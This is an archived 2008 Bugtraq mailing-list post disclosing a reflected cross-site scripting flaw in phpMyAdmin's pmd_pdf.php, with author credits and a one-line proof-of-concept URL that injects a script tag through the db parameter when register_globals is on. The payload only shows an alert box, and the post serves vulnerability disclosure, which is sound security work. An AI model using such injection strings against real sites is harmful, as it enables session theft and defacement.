[<prev] [next>] [day] [month] [year] [list]
Message-Id: <200810271202.m9RC2pto027680@www3.securityfocus.com>
Date: Mon, 27 Oct 2008 06:02:51 -0600
From: hadikiamarsi@...mail.com
To: bugtraq@...urityfocus.com
Subject: XSS in phpMyadmin
Author : Hadi Kiamarsi
-------------------------------------------
Discovered by : Hadi Kiamarsi
-------------------------------------------
Exploited By : Hadi Kiamarsi
-------------------------------------------
E-Mail : hadikiamarsi[at]hotmail.com
-------------------------------------------
web site : www.ircrash.com
-------------------------------------------
members team : Hadi Kiamarsi - khashayar fereidani - sina yazdanmehr
-------------------------------------------
Sript Name : phpmyadmin ( All version )
Download Script : http://prdownloads.sourceforge.net/phpmyadmin/phpMyAdmin-3.0.0-all-languages.zip?download
-------------------------------------------
XSS
Exploit :
register_globals=on
query : http://[www.example.com]/pmd_pdf.php?db=>"><script>alert('Hadi-Kiamarsi')</script>
Powered by blists - more mailing lists